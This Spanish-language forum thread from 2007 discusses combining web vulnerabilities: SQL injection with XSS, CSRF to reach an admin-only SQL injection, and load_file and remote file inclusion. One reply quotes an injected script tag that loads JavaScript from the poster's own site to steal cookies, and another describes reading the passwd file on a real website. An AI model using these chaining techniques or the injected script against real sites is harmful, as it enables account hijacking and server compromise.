elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 18:39  


Tema destacado: Grupo de Facebook de elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  mezcla de bugs...
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: mezcla de bugs...  (Leído 2,071 veces)
Ilorev


Desconectado Desconectado

Mensajes: 473


???


Ver Perfil
mezcla de bugs...
« en: 6 Septiembre 2007, 23:43 »

bueno... , mi pregunta es la siguiente ...  ¿ puede ver ocasiones en que se mezclen 2 bugs de diferentes tipo: xss con un sql inj o otros tipos de bug?.



En línea

EOF
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: mezcla de bugs...
« Respuesta #1 en: 7 Septiembre 2007, 02:31 »

Se puede dar el caso de a una misma variable se le de diferentes usos, por ejemplo...

Puedo realizar una consulta SQL poniendo en la clausula WHERE la variable, tipo GET y no filtrada, str, y a la misma vez, imprimir en la página el valor de la variable str.

Al no estar filtrada dicha variable se podrá realizar un ataque de inyección SQL y un ataque XSS al mismo tiempo, siempre y cuando se sepa jugar con la sintaxis de la inyección para no obtener errores.
En línea
Ilorev


Desconectado Desconectado

Mensajes: 473


???


Ver Perfil
Re: mezcla de bugs...
« Respuesta #2 en: 7 Septiembre 2007, 03:03 »

mmmmm.... suena interezante ... pero . al mezclarse .. otros 2 bugs.. no se pueden obterner mejores resultado refiriendome a explotacion ?
En línea

EOF
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: mezcla de bugs...
« Respuesta #3 en: 7 Septiembre 2007, 03:08 »

depende de cada aplicación, por ejemplo, podrias usar un CSRF para explotar un SQLinjection que solo es explotable en contexto de admin, y gracias a ese SQLinjection, generar un vector de XSS que te mande las cookies, o haga un ataque especifico.. he usado esto 1 sola vez, (un SQLinjection que modificaba el codigo del header, agregando un <script src=//misitio.com/js></script>, pero para explotarlo tenia que estar registrado como admin en wordpress, asi que lo combine con csrf xD).

Saludos!!
En línea

Ilorev


Desconectado Desconectado

Mensajes: 473


???


Ver Perfil
Re: mezcla de bugs...
« Respuesta #4 en: 7 Septiembre 2007, 03:43 »

cada vez esto suenas mas interezante...!! Woww
En línea

EOF
berz3k
Moderador
***
Desconectado Desconectado

Mensajes: 1.140



Ver Perfil
Re: mezcla de bugs...
« Respuesta #5 en: 7 Septiembre 2007, 13:36 »


Yep, alguna vez me encontre con una web que tenia XSS, al mandar el fuzzer con strings, me resulto un MySQL error, de ahi me logre injectar parametros con load_file para obtener el passwd, siempre se trastea demasiado por los "Sintaxis Errors" pero ello me llevo a otros bug sobre un PHP, un valiosisimo RFI (Remote File Incllusion), 3 vulnerabilidades que me ayudaron a obtener mejores resultados...

berz3k.

En línea
Ilorev


Desconectado Desconectado

Mensajes: 473


???


Ver Perfil
Re: mezcla de bugs...
« Respuesta #6 en: 7 Septiembre 2007, 19:56 »


Yep, alguna vez me encontre con una web que tenia XSS, al mandar el fuzzer con strings, me resulto un MySQL error, de ahi me logre injectar parametros con load_file para obtener el passwd, siempre se trastea demasiado por los "Sintaxis Errors" pero ello me llevo a otros bug sobre un PHP, un valiosisimo RFI (Remote File Incllusion), 3 vulnerabilidades que me ayudaron a obtener mejores resultados...

berz3k.



que descuidado el dueño de la web!
En línea

EOF
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[DNS] Problema con cierta zona, se mezcla !
Redes
Diabliyo 3 687 Último mensaje 17 Febrero 2011, 22:12
por Diabliyo
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines